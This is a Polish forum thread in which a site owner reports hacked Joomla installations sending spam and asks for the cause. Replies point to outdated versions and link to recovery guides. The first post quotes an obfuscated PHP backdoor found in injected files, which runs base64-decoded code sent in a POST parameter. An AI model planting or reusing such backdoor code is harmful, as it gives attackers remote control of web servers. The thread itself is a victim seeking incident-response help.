PDA

Zobacz pełną wersję : Pojawienie się dziwnych plików w katalogach z joomlą



rafiksq
28-12-2015, 11:29
Mam na serwerze kilka serwisów na różnych systemach w tym joomla. Od 2 tygodni serwisy oparte o joomle zostały zaatakowane. W katalogach pojawiają się dziwne pliki gallery.php, object.php. 1 z serwisow ma pliki z takimi kodami:

$qjqw2= "c6p4_sedobat"; $stve0=strtolower($qjqw2[9].$qjqw2[10].$qjqw2[5].$qjqw2[6] . $qjqw2[1]. $qjqw2[3].$qjqw2[4].$qjqw2[7].$qjqw2[6].$qjqw2[0].$qjqw2[8].$qjqw2[7]. $qjqw2[6] ) ; $awcb3=strtoupper ($qjqw2[4].$qjqw2[2].$qjqw2[8]. $qjqw2[5].$qjqw2[11]); if(isset ( ${$awcb3} ['n42dabb' ])){eval($stve0(${ $awcb3}[ 'n42dabb' ])) ;}

Atak objawił się po przez wysyłanie spamu. Jaka jest przyczyna? Dostęp przez ftp ?

tomaszek83
28-12-2015, 23:00
Przyczyn może być wiele. Nieaktualny Joomla, rozszerzenie dziurawe, serwer dziurawy, FTP nie szyfrowane itp, itd, etc...

Postępowanie po włamaniu masz tutaj (http://wiki.joomla.pl/Witryna_po_w%C5%82amaniu)

zwiastun
29-12-2015, 00:25
Pełny opis postępowania po włamaniu jest na stronie joomla.pl: http://www.joomla.pl/o-joomla/joomla-w-praktyce/mam-witryne-w-joomla/postepowanie-po-wlamaniu

Gall Anonim
29-12-2015, 01:26
Miej - więcej na dwa tygodnie przed świętami nastąpiło potężne zwiększenie aktywności ataków na Joomla - odpowiedzią na twoje pytanie jest oznaczona przez ciebie wersja - ataki ukierunkowane były na wersje od 3.1.1 do 3.4.4 (o ile dobrze kojarzę) - racz zauważyć że w bardzo krótkim czasie nastąpiło szereg aktualizacji Joomla - ostatnia bodajże 24 grudnia - do wersji 3.4.8 Tak więc ewidentnie padłeś ofiarą ataku - procedury wskazane w postach powyżej.
Pzdr